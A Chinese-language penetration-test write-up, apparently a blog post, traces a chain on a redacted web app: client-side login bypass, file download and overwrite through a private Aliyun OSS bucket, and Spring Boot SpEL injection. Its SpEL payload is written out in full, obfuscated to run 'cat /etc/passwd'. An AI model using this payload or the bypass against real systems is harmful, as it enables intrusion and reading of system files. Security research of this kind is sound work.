不一样的未授权访问到命令执行

一、概述

一次不一样的未授权访问到命令执行的案例。

二、正文

1、未授权进后台

访问后台：http://xxx.xxx.com/index.html，显示页面后瞬间返回登录页面， 抓包看到有个 /user/getSession 返回null

搜索getSession找到js，如果为null就跳到登录页面

将/user/getSession返回包null改成任意其他字符即可 然后就进后台了。

就这?

2、尝试任意文件上传

进后台后看看有什么功能，除了这两个查询就上传下载了，先试试任意文件上传上传个图片试试，直接500

换了几个文件发现不是文件类型的问题，试着在date处加个值果然是这里的问题，但是没有返回上传的文件路径啊

去下载处一直查询为空，置空查询也没有

看看js找找下载地址

试着拼接路径下载刚才上传的图片

/file/download/1/n_v2df5fc346207846b8913f719db19338fe.gif?sendType

上传jsp不解析，直接下载下来了。

3、利用阿里云OSS上传与下载

改个不存在的路径看看，发现指向了私有阿里云oss

联想到[1、未授权进后台]章节里面图三里面的信息，将文件日期、文件名称代入试试，好家伙，3个G直接502；换小点的文件倒是可以直接下载下来。

此处用了阿里云的OSS，存在任意文件覆盖的漏洞。

备注：在OSS中进行文件上传时，若文件名已经存在，则会直接进行文件替换。

4、利用spEL注入执行系统命令

Whitelabel Error Page和小绿叶的icon很明显用的SpringBoot；由于在页面中回显了查询值，于是推测可能存在表达式注入，尝试Payload${9999*9999}，成功执行，存在spEL注入

直接cat passwd

/file/download/1/$%7BT(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())%7D?sendType

三、总结

1、通过绕过客户端校验成功登录后台;

2、尝试任意文件上传，并通过JS源代码构造访问路径，失败告终;

3、通过构造访问路径下载任意数据文件，利用阿里云OSS特性覆盖任意文件;

4、利用SpringBoot spEL注入执行系统命令。

微信扫描二维码，关注我的公众号